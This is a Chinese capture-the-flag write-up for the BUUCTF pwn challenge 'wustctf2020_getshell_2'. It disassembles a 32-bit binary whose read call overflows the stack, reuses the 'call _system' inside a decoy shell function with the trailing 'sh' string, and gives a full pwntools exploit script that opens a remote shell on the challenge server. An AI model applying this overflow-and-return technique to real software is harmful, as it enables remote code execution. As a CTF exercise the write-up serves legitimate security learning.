BUUCTF-wustctf2020_getshell_2
一、题目来源
BUUCTF-Pwn-wustctf2020_getshell_2
二、信息搜集
通过 file 命令查看文件类型:
通过 checksec 命令查看文件采用的保护措施:
三、反汇编文件开始分析
main 函数中调用了 vulnerable 函数,点进去查看逻辑:
.text:08048582 public vulnerable
.text:08048582 vulnerable proc near ; CODE XREF: main+16↓p
.text:08048582
.text:08048582 buf= byte ptr -18h
.text:08048582
.text:08048582 ; __unwind {
.text:08048582 000 55 push ebp
.text:08048583 004 89 E5 mov ebp, esp
.text:08048585 004 83 EC 18 sub esp, 18h
.text:08048588 01C 83 EC 04 sub esp, 4
.text:0804858B 020 6A 24 push 24h ; '$' ; nbytes
.text:0804858D 024 8D 45 E8 lea eax, [ebp+buf]
.text:08048590 024 50 push eax ; buf
.text:08048591 028 6A 00 push 0 ; fd
.text:08048593 02C E8 18 FE FF FF call _read
.text:08048593
.text:08048598 02C 83 C4 10 add esp, 10h
.text:0804859B 01C 90 nop
.text:0804859C 01C C9 leave
.text:0804859D 000 C3 retn
.text:0804859D ; } // starts at 8048582
.text:0804859D
.text:0804859D vulnerable endp
不难发现,read 存在溢出的现象,但是溢出的长度并不多,除去无效 padding 部分,有效 payload 只能占 8 字节。
我们再注意到 .text 段中存在一个名为 shell 的函数,其代码:
.text:0804851B public shell
.text:0804851B shell proc near
.text:0804851B ; __unwind {
.text:0804851B 000 55 push ebp
.text:0804851C 004 89 E5 mov ebp, esp
.text:0804851E 004 83 EC 08 sub esp, 8
.text:08048521 00C 83 EC 0C sub esp, 0Ch
.text:08048524 018 68 50 86 04 08 push offset command ; "/bbbbbbbbin_what_the_f?ck__--??/sh"
.text:08048529 01C E8 B2 FE FF FF call _system
.text:08048529
.text:0804852E 01C 83 C4 10 add esp, 10h
.text:08048531 00C 90 nop
.text:08048532 00C C9 leave
.text:08048533 000 C3 retn
.text:08048533 ; } // starts at 804851B
.text:08048533
.text:08048533 shell endp
虽说其调用了 system 函数,但是其参数明显是来捣乱的。
但是,我们同时可以注意到,"sh"字符处于"/bbbbbbbbin_what_the_f?ck__--??/sh"这一长串字符的末尾部分,那么我们就可以采取“字符串劫持”的手段来提取字符"sh",若服务器端将"sh"放在环境变量中,我们依然可以实现 getshell。
.rodata:08048650 2F 62 62 62 62 62 62 62 62 69 command db '/bbbbbbbbin_what_the_f?ck__--??/sh',0
明显,我们的字符串 b'sh\x00' 所在的位置是 0x08048670。
四、Poc 构造
我们不能直接使用 system@plt 地址来构造我们的 ROP。
原因很简单,我们的有效 ROP 只允许我们添加两个 gadget,但是若要在 32 位CPU架构的计算机中正常调用 system 需要 3 个 gadget 即:
padding + system + fake_ret + arg1
但是,好在 shell 函数提供了新的思路给我们。
我们不一定要“自己构造 ROP 来实现函数调用”,我们可以直接用 shell 中的 call 来实现函数调用,只需要将地址定位在 0x08048529,即:
.text:08048529 01C E8 B2 FE FF FF call _system
从这开始运行,即CPU 默认你在栈上已经准备好了 system 所需要的参数。根据栈溢出,我们很容易实现在栈上准备好这个“参数”。
因此,最终 Poc:
from pwn import *context(arch="i386",os="linux",log_level="debug")# p = process("./pwn")
elf = ELF("./pwn")
p = remote("node5.buuoj.cn",25151)padding = 0x1c
system = 0x08048529
sh = 0x08048670payload = b'A'*padding + p32(system) + p32(sh)p.send(payload)p.interactive()
运行:
成功拿下 Flag!
![P14359 [CSP-J 2025] 异或和 / xor(官方数据)](http://pic.xiahunao.cn/P14359 [CSP-J 2025] 异或和 / xor(官方数据))
![从CPython底层解析:为何a=10 b=10复用对象,a=[] b=[]新建对象?](http://pic.xiahunao.cn/从CPython底层解析:为何a=10 b=10复用对象,a=[] b=[]新建对象?)
`,在排序过程中,`merge` 函数的递归调用次数大约是多少?)
)
